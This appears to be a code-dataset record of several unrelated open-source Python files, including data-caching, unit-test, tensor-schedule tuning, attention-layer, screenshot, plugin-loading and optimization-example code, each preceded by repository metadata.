# chunks_list is of form [[ar1x, ar2x, a3x], [ar1y, ar2y, a3y]]
# and now we want to yield
# * i1, i2 {'x': ar1x, 'y': ar1y}
# * i1, i2 {'x': ar2x, 'y': ar2y}
# * i1, i2 {'x': ar3x, 'y': ar3y}
names = [name for name, chunks in columns_cached.items()]
i1 = 0
i2 = 0
for chunks in zip(*chunks_list):
i2 += len(chunks[0])
for chunk in chunks:
assert len(chunk) == len(chunks[0])
yield i1, i2, dict(zip(names, chunks))
i1 = i2
if columns_cached:
cached_iter = chunk_rechunk(cached_iterator(), chunk_size)
else:
cached_iter = empty_chunk_iterator(0, self.row_count, chunk_size)
if column_required:
original_iter = self.original.chunk_iterator(column_required, chunk_size, reverse=reverse)
else:
original_iter = empty_chunk_iterator(0, self.row_count, chunk_size)
original_iter = list(original_iter)
cached_iter = list(cached_iter)
for (o1, o2, ochunks), (c1, c2, cchunks) in zip(original_iter, cached_iter):
assert o1 == c1
assert o2 == c2
yield o1, o2, {**ochunks, **cchunks}
for name in columns_to_cache:
if self.to_numpy:
ochunks = {k: vaex.array_types.to_numpy(v) for k, v in ochunks.items()}
cache_chunks[name].append(ochunks[name])
# we write it to the cache in one go
for name in columns_to_cache:
self.cache[self._cache_key(name)] = cache_chunks[name]
def slice(self, start, end):
if start == 0 and end == self.row_count:
return self
return type(self)(self.original.slice(start, end), self.names, cache=self.cache)
def hashed(self):
if set(self._ids) == set(self):
return self
return type(self)(self.original.hashed(), self.names, cache=self.cache)
def _cache_key(self, name):
return f"{self.fingerprint}-{name}"
|
h2o-py/tests/testdir_jira/pyunit_pubdev_6603.py
|
ahmedengu/h2o-3
| 6,098 |
76127
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
sys.path.insert(1,"../../")
from tests import pyunit_utils
import h2o
import pandas as pd
def pubdev_6603():
hf = h2o.H2OFrame(pd.DataFrame([{'a': 1, 'b': 2}, {'a': 3, 'b': 4}]))
s1, s2 = hf.split_frame(ratios=[0.5], seed=1)
h2o.remove([hf, s1, s2])
assert len(h2o.ls()) == 0
if __name__ == "__main__":
pyunit_utils.standalone_test(pubdev_6603)
else:
pubdev_6603()
|
flextensor/optimize/optimize_gemm_conv2d.py
|
imxian/FlexTensor
| 135 |
76137
|
<reponame>imxian/FlexTensor<filename>flextensor/optimize/optimize_gemm_conv2d.py
import os
import sys
import argparse
import time
import json
import tvm
import torch
from flextensor.utils import Config
from flextensor.task import Task, TASK_TABLE
from flextensor.scheduler import schedule, schedule_with_config
from flextensor.measure import _evaluate
from flextensor.configs.conv2d_config import *
shape_dict = {
"yolo": yolo_shapes,
"google": google_shapes,
"squeeze": squeeze_shapes,
"res": res_shapes,
"vgg-16": vgg_16_shapes,
"vgg-19": vgg_19_shapes
}
def optimize(prefix, from_, shapes, target="llvm", dev_id=0, trials=100, timeout=4.0, parallel=1, method="searching", use_model=False, logfile=sys.stdout):
ret = dict()
for i, shape in enumerate(shapes):
print("Optimize {} convolution layer {} shape {}".format(prefix, i + 1 + from_, shape), flush=True)
batch, in_channel, height, width, out_channel, _, k_h, k_w, _, stride, padding, _, _ = shape
# create an empty task but has the correct key we want
task = Task(
"gemm_conv2d",
prefix + str(i + from_),
None,
(batch, in_channel, height, width, out_channel, k_h, stride, padding, 1, 1),
target,
dev_id
)
beg = time.time()
s, bufs, configs = schedule(
task.key,
op_trial=trials,
timeout=timeout,
op_stop=30,
parallel=parallel,
method=method,
use_model=use_model,
trials=[trials//10, trials//5, trials, trials//5]
)
end = time.time()
# print(tvm.lower(s, bufs, simple_mode=True))
print("######################################")
print("op schedules:")
for config in configs.op_config_lst:
print("----------------------------------")
for name, value in config.items():
if value:
print(name, value)
print("######################################")
print("graph schedules:")
for name, value in configs.graph_config.items():
if value:
print(name, value)
ret[task.key] = configs
string = json.dumps(configs)
line = task.key + ":" + string
print(line, file=logfile, flush=True)
s, bufs = schedule_with_config(task.key, configs)
time_cost = _evaluate(s, bufs, target, task.dev_id, 10)
print("######################################")
print("Use", time_cost, "ms")
print("Cost", end - beg, "s")
print()
return ret
def test(task_key, configs, dev_id=None):
task = TASK_TABLE[task_key]
s, bufs = schedule_with_config(task_key, configs)
dev_id = dev_id if dev_id is not None else task.dev_id
time_cost = _evaluate(s, bufs, task.target, dev_id, 10)
print(task_key, "use", time_cost, "ms")
print()
def schedule_with_config_local():
with open("/home/retina/skw/work/AutoScheduler/gemm_conv.log", 'r') as f:
"""
(1, 3, 448, 448, 64, 3, 7, 7, 1, 2, 3, 1, 1)
Conv 2d on cpu: 0.011640000343322753s
Conv 2d on cuda: 0.006447720527648926s
(1, 64, 112, 112, 192, 64, 3, 3, 1, 1, 1, 1, 1)
Conv 2d on cpu: 0.010520696640014648s
Conv 2d on cuda: 0.006895184516906738s
(1, 192, 56, 56, 128, 192, 1, 1, 1, 1, 0, 1, 1)
Conv 2d on cpu: 0.00572810173034668s
Conv 2d on cuda: 0.005124855041503906s
(1, 128, 56, 56, 256, 128, 3, 3, 1, 1, 1, 1, 1)
Conv 2d on cpu: 0.005372405052185059s
Conv 2d on cuda: 0.003541111946105957s
(1, 256, 56, 56, 256, 256, 1, 1, 1, 1, 0, 1, 1)
Conv 2d on cpu: 0.00752255916595459s
Conv 2d on cuda: 0.0071736335754394535s
(1, 256, 56, 56, 512, 256, 3, 3, 1, 1, 1, 1, 1)
Conv 2d on cpu: 0.014762544631958007s
Conv 2d on cuda: 0.006854510307312012s
(1, 512, 28, 28, 256, 512, 1, 1, 1, 1, 0, 1, 1)
Conv 2d on cpu: 0.0043433189392089845s
Conv 2d on cuda: 0.0035385370254516603s
(1, 256, 28, 28, 512, 256, 3, 3, 1, 1, 1, 1, 1)
Conv 2d on cpu: 0.005109810829162597s
Conv 2d on cuda: 0.0018965244293212891s
(1, 512, 28, 28, 512, 512, 1, 1, 1, 1, 0, 1, 1)
Conv 2d on cpu: 0.004613542556762695s
Conv 2d on cuda: 0.003508114814758301s
(1, 512, 28, 28, 1024, 512, 3, 3, 1, 1, 1, 1, 1)
Conv 2d on cpu: 0.015011453628540039s
Conv 2d on cuda: 0.0038038253784179687s
(1, 1024, 14, 14, 512, 1024, 1, 1, 1, 1, 0, 1, 1)
Conv 2d on cpu: 0.003091883659362793s
Conv 2d on cuda: 0.001864314079284668s
(1, 512, 14, 14, 1024, 512, 3, 3, 1, 1, 1, 1, 1)
Conv 2d on cpu: 0.007311129570007324s
Conv 2d on cuda: 0.0012821674346923829s
(1, 1024, 14, 14, 1024, 1024, 3, 3, 1, 1, 1, 1, 1)
Conv 2d on cpu: 0.020050597190856934s
Conv 2d on cuda: 0.0026390790939331056s
(1, 1024, 14, 14, 1024, 1024, 3, 3, 1, 2, 1, 1, 1)
Conv 2d on cpu: 0.0181943416595459s
Conv 2d on cuda: 0.002562427520751953s
(1, 1024, 7, 7, 1024, 1024, 3, 3, 1, 1, 1, 1, 1)
Conv 2d on cpu: 0.018287014961242676s
Conv 2d on cuda: 0.0017349958419799806s
"""
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--shapes", help="Use which shapes [yolo, google, res, squeeze, vgg-16, vgg-19]", type=str, default="")
parser.add_argument("-f", "--from_", help="From which shape", type=int, default=0)
parser.add_argument("-t", "--to", help="To which shape", type=int, default=-1)
parser.add_argument("-l", "--log", help="Log file name", type=str, default="")
parser.add_argument("--test", help="test file name", type=str, default="")
parser.add_argument("--trials", help="number of trials for op", type=int, default=100)
parser.add_argument("--target", help="target device type", type=str, default="llvm")
parser.add_argument("--device", help="target device number", type=int, default=0)
parser.add_argument("--timeout", help="timeout", type=float, default=4.0)
parser.add_argument("--parallel", help="parallel", type=int, default=1)
parser.add_argument("--use_model", help="use performance model", action="store_true")
parser.add_argument("--method", help="how to schedule", type=str, default="searching")
parser.add_argument("--test_torch", help="whether to test torch implementation", type=bool, default=False)
args = parser.parse_args()
if args.shapes != "":
shapes = shape_dict[args.shapes]
if args.to < 0:
end = len(shapes)
else:
end = args.to
if args.log != "":
with open(args.log, "a") as flog:
ret = optimize(
args.shapes, args.from_,
shapes[args.from_:end],
target=args.target,
dev_id=args.device,
timeout=args.timeout,
trials=args.trials,
parallel=args.parallel,
method=args.method,
use_model=args.use_model,
logfile=flog
)
else:
ret = optimize(
args.shapes,
args.from_,
shapes[args.from_:end],
target=args.target,
dev_id=args.device,
timeout=args.timeout,
trials=args.trials,
parallel=args.parallel,
method=args.method,
use_model=args.use_model,
logfile=sys.stdout
)
if args.test != "":
with open(args.test, "r") as fin:
for line in fin:
name, string = line.split(":", 1)
obj = json.loads(string)
configs = Config(obj[0], obj[1])
test(name, configs, dev_id=args.device)
if args.test_torch:
assert args.shapes != ""
shapes = shape_dict[args.shapes]
""" Warm up """
batch, in_channel, height, width, out_channel, _, k_h, k_w, _, stride, padding, dilation, groups = shapes[0]
conv2d = torch.nn.Conv2d(in_channel, out_channel, (k_h, k_w), stride=stride, padding=padding, dilation=dilation, groups=groups).cuda()
img = torch.rand((batch, in_channel, height, width)).cuda()
res = conv2d(img)
for shape in shapes:
print(shape)
batch, in_channel, height, width, out_channel, _, k_h, k_w, _, stride, padding, dilation, groups = shape
start_time = time.time()
conv2d = torch.nn.Conv2d(in_channel, out_channel, (k_h, k_w), stride=stride, padding=padding, dilation=dilation, groups=groups)
for i in range(args.trials):
img = torch.rand((batch, in_channel, height, width))
res = conv2d(img)
cpu_time = time.time() - start_time
print("Conv 2d on cpu: {}s".format(cpu_time / args.trials))
start_time = time.time()
conv2d = conv2d.cuda()
for i in range(args.trials):
img = torch.rand((batch, in_channel, height, width)).cuda()
res = conv2d(img)
cuda_time = time.time() - start_time
print("Conv 2d on cuda: {}s".format(cuda_time / args.trials))
|
bookwyrm/tests/views/imports/test_import_review.py
|
mouse-reeve/fedireads
| 270 |
76140
|
<reponame>mouse-reeve/fedireads
""" test for app action functionality """
from unittest.mock import patch
from django.template.response import TemplateResponse
from django.test import TestCase
from django.test.client import RequestFactory
from bookwyrm.tests.validate_html import validate_html
from bookwyrm import models, views
class ImportManualReviewViews(TestCase):
"""goodreads import views"""
def setUp(self):
"""we need basic test data and mocks"""
self.factory = RequestFactory()
with patch("bookwyrm.suggested_users.rerank_suggestions_task.delay"), patch(
"bookwyrm.activitystreams.populate_stream_task.delay"
), patch("bookwyrm.lists_stream.populate_lists_task.delay"):
self.local_user = models.User.objects.create_user(
"<EMAIL>",
"<EMAIL>",
"password",
local=True,
localname="mouse",
)
models.SiteSettings.objects.create()
self.job = models.ImportJob.objects.create(user=self.local_user, mappings={})
work = models.Work.objects.create(title="Test Work")
self.book = models.Edition.objects.create(
title="Example Edition",
remote_id="https://example.com/book/1",
parent_work=work,
)
def test_import_troubleshoot_get(self):
"""there are so many views, this just makes sure it LOADS"""
view = views.ImportManualReview.as_view()
request = self.factory.get("")
request.user = self.local_user
with patch("bookwyrm.tasks.app.AsyncResult") as async_result:
async_result.return_value = []
result = view(request, self.job.id)
self.assertIsInstance(result, TemplateResponse)
validate_html(result.render())
self.assertEqual(result.status_code, 200)
def test_approve_item(self):
"""a guess is correct"""
import_item = models.ImportItem.objects.create(
index=0,
job=self.job,
book_guess=self.book,
fail_reason="no match",
data={},
normalized_data={},
)
request = self.factory.post("")
request.user = self.local_user
with patch("bookwyrm.importers.importer.import_item_task.delay") as mock:
views.approve_import_item(request, self.job.id, import_item.id)
self.assertEqual(mock.call_count, 1)
import_item.refresh_from_db()
self.assertIsNone(import_item.fail_reason)
self.assertIsNone(import_item.book_guess)
self.assertEqual(import_item.book.id, self.book.id)
def test_delete_item(self):
"""a guess is correct"""
import_item = models.ImportItem.objects.create(
index=0,
job=self.job,
book_guess=self.book,
fail_reason="no match",
data={},
normalized_data={},
)
request = self.factory.post("")
request.user = self.local_user
views.delete_import_item(request, self.job.id, import_item.id)
import_item.refresh_from_db()
self.assertEqual(import_item.fail_reason, "no match")
self.assertIsNone(import_item.book_guess)
self.assertIsNone(import_item.book)
|
projects/capture_screenshot/screenshot.py
|
rossi2018/python-mini-projects
| 9,957 |
76142
|
import os
import argparse
import pyautogui
import time
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--path", help="absolute path to store screenshot.", default=r"./images")
parser.add_argument("-t", "--type", help="h (in hour) or m (in minutes) or s (in seconds)", default='h')
parser.add_argument("-f", "--frequency", help="frequency for taking screenshot per h/m/s.", default=1, type=int)
args = parser.parse_args()
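# Illustrative invocation (hypothetical values): `python screenshot.py -t m -f 2`
# saves a screenshot every 30 seconds (60 / frequency); intervals below one
# second are clamped to one second by the check further down.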
sec = 0.
if args.type == 'h':
sec = 60 * 60 / args.frequency
elif args.type == 's': sec = 1. / args.frequency  # seconds, as the --type help text documents
elif args.type == 'm':
sec = 60 / args.frequency
if sec < 1.:
sec = 1.
if os.path.isdir(args.path) != True:
os.mkdir(args.path)
try:
while True:
t = time.localtime()
current_time = time.strftime("%H_%M_%S", t)
file = current_time + ".jpg"
image = pyautogui.screenshot(os.path.join(args.path,file))
print(f"{file} saved successfully.\n")
time.sleep(sec)
except KeyboardInterrupt:
print("End of script by user interrupt")
|
flocker/provision/_effect.py
|
stackriot/flocker
| 2,690 |
76172
|
<filename>flocker/provision/_effect.py
from functools import partial, reduce
from six import reraise
from characteristic import attributes
from effect import (
sync_performer, Effect,
ComposedDispatcher, TypeDispatcher, base_dispatcher)
from treq import get
from pyrsistent import PClass, field
from txeffect import deferred_performer
from eliot import startAction, Message
from eliot.twisted import DeferredContext
# This is from https://github.com/radix/effect/pull/46
@attributes(['results', 'exc_info'], apply_immutable=True)
class SequenceFailed(Exception, object):
"""
Raised if an effect in a :class:``Sequence`` fails.
:ivar list results: The list of successful results.
:ivar error: The error result of the last run effect.
"""
def __str__(self):
# Exception has a custom __str__ that looks at arguments passed to its
# init. Since we don't pass any, it is useless. The following will
# duplicate the class name in the traceback, but is better than
# otherwise.
return repr(self)
@attributes(["effects"], apply_with_init=False, apply_immutable=True)
class Sequence(object):
"""
Runs a sequence of effects serially.
:returns list: The list of results of the effects.
:raises SequenceFailed: If one of the effects fails.
"""
def __init__(self, effects):
"""
:param effects: The list of effects to execute in sequence.
"""
self.effects = effects
def sequence(effects):
"""
Given multiple Effects, return one Effect that represents the sequence of
all of their effects. The result of the aggregate Effect will be a list of
their results, in the same order as the input to this function. If any
child effect fails, the first such failure will be propagated as a
:class:`SequenceFailed` exception.
:param effects: Effects which should be performed in sequence.
:return: An Effect that results in a list of results, or which fails with
a :class:`SequenceFailed`.
"""
return Effect(Sequence(list(effects)))
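# Illustrative sketch (not part of the original module; the URLs are made up):
# composing two GET effects and running them in order via the module-level
# `dispatcher` defined at the bottom of this file.
#
#     eff = sequence([http_get(b"http://example.com/a"),
#                     http_get(b"http://example.com/b")])
#     # performing `eff` against `dispatcher` yields [response_a, response_b],
#     # or raises SequenceFailed as soon as one of the requests fails.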
@sync_performer
def perform_sequence(dispatcher, intent):
"""Performer for :class:`Sequence`."""
effects = list(intent.effects)
if not effects:
return []
results = []
def succeed(next_effect, result):
results.append(result)
return next_effect
def fail(result):
reraise(SequenceFailed,
SequenceFailed(results=results, exc_info=result),
result[2])
def reducer(next_effect, effect):
return effect.on(success=partial(succeed, next_effect),
error=fail)
return reduce(reducer, reversed(effects), results)
class HTTPGet(PClass):
"""
Intent for HTTP GET requests.
:ivar bytes url: The URL to make a GET request to.
"""
url = field(type=bytes, mandatory=True)
def http_get(url):
"""
Wrapper to create an :class:`HTTPGet` Effect.
:param bytes url: The url to make a GET request to.
:returns: The ``Effect`` of making a GET request to ``url``.
"""
return Effect(HTTPGet(url=url))
@deferred_performer
def treq_get(dispatcher, intent):
"""
Performer to execute an HTTP GET.
:param dispatcher: The dispatcher used to dispatch this performance.
:param HTTPGet intent: The intent to be performed.
"""
action = startAction(action_type=u"flocker:provision:_effect:treq_get")
with action.context():
Message.log(url=intent.url)
# Do not use persistent HTTP connections, because they will not be
# cleaned up by the end of the test.
d = DeferredContext(get(intent.url, persistent=False))
d.addActionFinish()
return d.result
dispatcher = ComposedDispatcher([
TypeDispatcher({
Sequence: perform_sequence,
HTTPGet: treq_get,
}),
base_dispatcher,
])
|
language/question_answering/decatt_docreader/layers/decomposable_attention.py
|
naveenjafer/language
| 1,199 |
76211
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of decomposable attention model.
https://arxiv.org/abs/1606.01933.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from language.common.layers import common_layers
from language.common.utils import tensor_utils
import tensorflow.compat.v1 as tf
def decomposable_attention(emb1, len1, emb2, len2, hidden_size, hidden_layers,
dropout_ratio, mode, epsilon=1e-8):
"""See https://arxiv.org/abs/1606.01933.
Args:
emb1: A Tensor with shape [batch_size, max_len1, emb_size] representing the
first input sequence.
len1: A Tensor with shape [batch_size], indicating the true sequence length
of `emb1`. This is required due to padding.
emb2: A Tensor with shape [batch_size, max_len2, emb_size] representing the
second input sequence.
len2: A Tensor with shape [batch_size], indicating the true sequence length
of `emb1`. This is required due to padding.
hidden_size: An integer indicating the size of each hidden layer in the
feed-forward neural networks.
hidden_layers: An integer indicating the number of hidden layers in the
feed-forward neural networks.
dropout_ratio: The probability of dropping out each unit in the activation.
This can be None, and is only applied during training.
mode: One of the keys from tf.estimator.ModeKeys.
epsilon: A small positive constant to add to masks for numerical stability.
Returns:
final_emb: A Tensor with shape [batch_size, hidden_size].
"""
# [batch_size, maxlen1]
mask1 = tf.sequence_mask(len1, tensor_utils.shape(emb1, 1), dtype=tf.float32)
# [batch_size, maxlen2]
mask2 = tf.sequence_mask(len2, tensor_utils.shape(emb2, 1), dtype=tf.float32)
with tf.variable_scope("attend"):
projected_emb1 = common_layers.ffnn(
emb1, [hidden_size] * hidden_layers, dropout_ratio, mode)
with tf.variable_scope("attend", reuse=True):
projected_emb2 = common_layers.ffnn(
emb2, [hidden_size] * hidden_layers, dropout_ratio, mode)
# [batch_size, maxlen1, maxlen2]
attention_scores = tf.matmul(projected_emb1, projected_emb2, transpose_b=True)
attention_weights1 = tf.nn.softmax(
attention_scores + tf.log(tf.expand_dims(mask2, 1) + epsilon), 2)
attention_weights2 = tf.nn.softmax(
attention_scores + tf.log(tf.expand_dims(mask1, 2) + epsilon), 1)
# [batch_size, maxlen1, emb_size]
attended_emb1 = tf.matmul(attention_weights1, emb2)
# [batch_size, maxlen2, emb_size]
attended_emb2 = tf.matmul(attention_weights2, emb1, transpose_a=True)
with tf.variable_scope("compare"):
compared_emb1 = common_layers.ffnn(
tf.concat([emb1, attended_emb1], -1),
[hidden_size] * hidden_layers,
dropout_ratio, mode)
with tf.variable_scope("compare", reuse=True):
compared_emb2 = common_layers.ffnn(
tf.concat([emb2, attended_emb2], -1),
[hidden_size] * hidden_layers,
dropout_ratio, mode)
compared_emb1 *= tf.expand_dims(mask1, -1)
compared_emb2 *= tf.expand_dims(mask2, -1)
# [batch_size, hidden_size]
aggregated_emb1 = tf.reduce_sum(compared_emb1, 1)
aggregated_emb2 = tf.reduce_sum(compared_emb2, 1)
with tf.variable_scope("aggregate"):
final_emb = common_layers.ffnn(
tf.concat([aggregated_emb1, aggregated_emb2], -1),
[hidden_size] * hidden_layers,
dropout_ratio,
mode)
return final_emb
|
IOPool/Input/test/test_make_multi_lumi_cfg.py
|
ckamtsikis/cmssw
| 852 |
76216
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("WRITE")
process.source = cms.Source("EmptySource", numberEventsInLuminosityBlock = cms.untracked.uint32(4))
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(20))
process.out = cms.OutputModule("PoolOutputModule", fileName = cms.untracked.string("multi_lumi.root"))
process.o = cms.EndPath(process.out)
|
indra/sources/reach/reader.py
|
zebulon2/indra
| 136 |
76217
|
<filename>indra/sources/reach/reader.py
from __future__ import absolute_import, print_function, unicode_literals
from builtins import dict, str
import os
import logging
from indra import get_config
# Before the import, we have to deal with the CLASSPATH to avoid clashes
# with Eidos.
def _set_classpath():
clp = os.environ.get('CLASSPATH')
eip = get_config('EIDOSPATH')
rep = get_config('REACHPATH')
clp_parts = clp.split(':') if clp else []
new_clp_parts = []
has_reach = False
# Look at all the parts of the CLASSPATH
for part in clp_parts:
# If Eidos is on the CLASSPATH, remove it
if not eip or os.path.abspath(part) != eip:
new_clp_parts.append(part)
# If REACH is not on the CLASSPATH, add it
if rep and os.path.abspath(part) == rep:
has_reach = True
if rep and not has_reach:
new_clp_parts.append(rep)
# Set the new CLASSPATH
new_clp = ':'.join(new_clp_parts)
os.environ['CLASSPATH'] = new_clp
_set_classpath()
from indra.java_vm import autoclass, JavaException
logger = logging.getLogger(__name__)
class ReachOfflineReadingError(Exception):
pass
class ReachReader(object):
"""The ReachReader wraps a singleton instance of the REACH reader.
This allows calling the reader many times without having to wait for it to
start up each time.
Attributes
----------
api_ruler : org.clulab.reach.apis.ApiRuler
An instance of the REACH ApiRuler class (java object).
"""
def __init__(self):
self.api_ruler = None
def get_api_ruler(self):
"""Return the existing reader if it exists or launch a new one.
Returns
-------
api_ruler : org.clulab.reach.apis.ApiRuler
An instance of the REACH ApiRuler class (java object).
"""
if self.api_ruler is None:
try:
self.api_ruler = \
autoclass('org.clulab.reach.export.apis.ApiRuler')
except JavaException as e:
raise ReachOfflineReadingError(e)
return self.api_ruler
|
examples/singleobjective/simulated_annealing/simulated_annealing_binary.py
|
12yuens2/jMetalPy
| 335 |
76226
|
from jmetal.algorithm.singleobjective.simulated_annealing import SimulatedAnnealing
from jmetal.operator import BitFlipMutation
from jmetal.problem import OneMax
from jmetal.util.solution import print_function_values_to_file, print_variables_to_file
from jmetal.util.termination_criterion import StoppingByEvaluations
if __name__ == '__main__':
problem = OneMax(number_of_bits=1024)
max_evaluations = 20000
algorithm = SimulatedAnnealing(
problem=problem,
mutation=BitFlipMutation(probability=1.0 / problem.number_of_bits),
termination_criterion=StoppingByEvaluations(max_evaluations=max_evaluations)
)
algorithm.run()
result = algorithm.get_result()
# Save results to file
print_function_values_to_file(result, 'FUN.'+ algorithm.get_name() + "." + problem.get_name())
print_variables_to_file(result, 'VAR.' + algorithm.get_name() + "." + problem.get_name())
print('Algorithm: ' + algorithm.get_name())
print('Problem: ' + problem.get_name())
print('Solution: ' + result.get_binary_string())
print('Fitness: ' + str(result.objectives[0]))
print('Computing time: ' + str(algorithm.total_computing_time))
|
owtf/managers/plugin.py
|
Udbhavbisarya23/owtf
| 1,514 |
76235
|
<reponame>Udbhavbisarya23/owtf<gh_stars>1000+
"""
owtf.managers.plugin
~~~~~~~~~~~~~~~~~~~~
This module manages the plugins and their dependencies
"""
import imp
import json
import os
from owtf.models.plugin import Plugin
from owtf.models.test_group import TestGroup
from owtf.settings import PLUGINS_DIR
from owtf.utils.error import abort_framework
from owtf.utils.file import FileOperations
TEST_GROUPS = ["web", "network", "auxiliary"]
def get_test_groups_config(file_path):
"""Reads the test groups from a config file
.. note::
This needs to be a list instead of a dictionary to preserve order in python < 2.7
:param file_path: The path to the config file
:type file_path: `str`
:return: List of test groups
:rtype: `list`
"""
test_groups = []
config_file = FileOperations.open(file_path, "r").read().splitlines()
for line in config_file:
if "#" == line[0]:
continue # Skip comments
try:
code, priority, descrip, hint, url = line.strip().split(" | ")
except ValueError:
abort_framework(
"Problem in Test Groups file: '{!s}' -> Cannot parse line: {!s}".format(
file_path, line
)
)
if len(descrip) < 2:
descrip = hint
if len(hint) < 2:
hint = ""
test_groups.append(
{
"code": code,
"priority": priority,
"descrip": descrip,
"hint": hint,
"url": url,
}
)
return test_groups
def load_test_groups(session, file_default, file_fallback, plugin_group):
"""Load test groups into the DB.
:param test_groups_file: The path to the test groups config
:type test_groups_file: `str`
:param plugin_group: Plugin group to load
:type plugin_group: `str`
:return: None
:rtype: None
"""
file_path = file_default
if not os.path.isfile(file_default):
file_path = file_fallback
test_groups = get_test_groups_config(file_path)
for group in test_groups:
session.merge(
TestGroup(
code=group["code"],
priority=group["priority"],
descrip=group["descrip"],
hint=group["hint"],
url=group["url"],
group=plugin_group,
)
)
session.commit()
def load_plugins(session):
"""Loads the plugins from the filesystem and updates their info.
.. note::
Walks through each sub-directory of `PLUGINS_DIR`.
For each file, loads it using the imp module.
Updates the database with the information for each plugin:
+ 'title': the title of the plugin
+ 'name': the name of the plugin
+ 'code': the internal code of the plugin
+ 'group': the group of the plugin (ex: web)
+ 'type': the type of the plugin (ex: active, passive, ...)
+ 'descrip': the description of the plugin
+ 'file': the filename of the plugin
+ 'internet_res': does the plugin use internet resources?
:return: None
:rtype: None
"""
# TODO: When the -t, -e or -o is given to OWTF command line, only load
# the specific plugins (and not all of them like below).
# Retrieve the list of the plugins (sorted) from the directory given by
# 'PLUGIN_DIR'.
plugins = []
for root, _, files in os.walk(PLUGINS_DIR):
plugins.extend(
[
os.path.join(root, filename)
for filename in files
if filename.endswith("py")
]
)
plugins = sorted(plugins)
# Retrieve the information of the plugin.
for plugin_path in plugins:
# Only keep the relative path to the plugin
plugin = plugin_path.replace(PLUGINS_DIR, "")
# TODO: Using os.path.sep might not be portable especially on
# Windows platform since it allows '/' and '\' in the path.
# Retrieve the group, the type and the file of the plugin.
# Ensure all empty strings are removed from the list
chunks = list(filter(None, plugin.split(os.path.sep)))
# TODO: Ensure that the variables group, type and file exist when
# the length of chunks is less than 3.
if len(chunks) == 3:
group, type, file = chunks
# Retrieve the internal name and code of the plugin.
name, code = os.path.splitext(file)[0].split("@")
# Only load the plugin if in XXX_TEST_GROUPS configuration (e.g. web_testgroups.cfg)
if session.query(TestGroup).get(code) is None:
continue
# Load the plugin as a module.
filename, pathname, desc = imp.find_module(
os.path.splitext(os.path.basename(plugin_path))[0],
[os.path.dirname(plugin_path)],
)
plugin_module = imp.load_module(
os.path.splitext(file)[0], filename, pathname, desc
)
# Try to retrieve the `attr` dictionary from the module and convert
# it to json in order to save it into the database.
attr = None
try:
attr = json.dumps(plugin_module.ATTR)
except AttributeError: # The plugin didn't define an attr dict.
pass
# Save the plugin into the database.
session.merge(
Plugin(
key="{!s}@{!s}".format(type, code),
group=group,
type=type,
title=name.title().replace("_", " "),
name=name,
code=code,
file=file,
descrip=plugin_module.DESCRIPTION,
attr=attr,
)
)
session.commit()
def get_types_for_plugin_group(session, plugin_group):
"""Get available plugin types for a plugin group
:param plugin_group: Plugin group
:type plugin_group: `str`
:return: List of available plugin types
:rtype: `list`
"""
plugin_types = session.query(Plugin.type).filter_by(
group=plugin_group
).distinct().all()
plugin_types = [i[0] for i in plugin_types]
return plugin_types
def plugin_gen_query(session, criteria):
"""Generate a SQLAlchemy query based on the filter criteria
:param criteria: Filter criteria
:type criteria: `dict`
:return:
:rtype:
"""
query = session.query(Plugin).join(TestGroup)
if criteria.get("type", None):
if isinstance(criteria["type"], str):
query = query.filter(Plugin.type == criteria["type"])
if isinstance(criteria["type"], list):
query = query.filter(Plugin.type.in_(criteria["type"]))
if criteria.get("group", None):
if isinstance(criteria["group"], str):
query = query.filter(Plugin.group == criteria["group"])
if isinstance(criteria["group"], list):
query = query.filter(Plugin.group.in_(criteria["group"]))
if criteria.get("code", None):
if isinstance(criteria["code"], str):
query = query.filter(Plugin.code == criteria["code"])
if isinstance(criteria["code"], list):
query = query.filter(Plugin.code.in_(criteria["code"]))
if criteria.get("name", None):
if isinstance(criteria["name"], str):
query = query.filter(Plugin.name == criteria["name"])
if isinstance(criteria["name"], list):
query = query.filter(Plugin.name.in_(criteria["name"]))
return query.order_by(TestGroup.priority.desc())
def get_all_plugin_dicts(session, criteria=None):
"""Get plugin dicts based on filter criteria
:param criteria: Filter criteria
:type criteria: `dict`
:return: List of plugin dicts
:rtype: `list`
"""
if criteria is None:
criteria = {}
if "code" in criteria:
criteria["code"] = Plugin.name_to_code(session, criteria["code"])
query = plugin_gen_query(session, criteria)
plugin_obj_list = query.all()
plugin_dicts = []
for obj in plugin_obj_list:
plugin_dicts.append(obj.to_dict())
return plugin_dicts
def get_plugins_by_type(session, plugin_type):
"""Get plugins based on type argument
:param plugin_type: Plugin type
:type plugin_type: `str`
:return: List of plugin dicts
:rtype: `list`
"""
return get_all_plugin_dicts(session, {"type": plugin_type})
def get_plugins_by_group(session, plugin_group):
"""Get plugins by plugin group
:param plugin_group: Plugin group
:type plugin_group: `str`
:return: List of plugin dicts
:rtype: `list`
"""
return get_all_plugin_dicts(session, {"group": plugin_group})
def get_plugins_by_group_type(session, plugin_group, plugin_type):
"""Get plugins by group and plugin type
:param plugin_group: Plugin group
:type plugin_group: `str`
:param plugin_type: plugin type
:type plugin_type: `str`
:return: List of plugin dicts
:rtype: `list`
"""
return get_all_plugin_dicts(session, {"type": plugin_type, "group": plugin_group})
|
tests/test_utils_geodesic.py
|
qbarthelemy/pyRiemann
| 301 |
76263
|
<reponame>qbarthelemy/pyRiemann
import numpy as np
from pyriemann.utils.geodesic import (
geodesic_riemann,
geodesic_euclid,
geodesic_logeuclid,
geodesic,
)
from pyriemann.utils.mean import mean_riemann, mean_logeuclid, mean_euclid
import pytest
from pytest import approx
def get_geod_func():
geod_func = [geodesic_riemann, geodesic_euclid, geodesic_logeuclid]
for gf in geod_func:
yield gf
def get_geod_name():
geod_name = ["riemann", "euclid", "logeuclid"]
for gn in geod_name:
yield gn
@pytest.mark.parametrize(
"geodesic_func", [geodesic_riemann, geodesic_euclid, geodesic_logeuclid]
)
class GeodesicFuncTestCase:
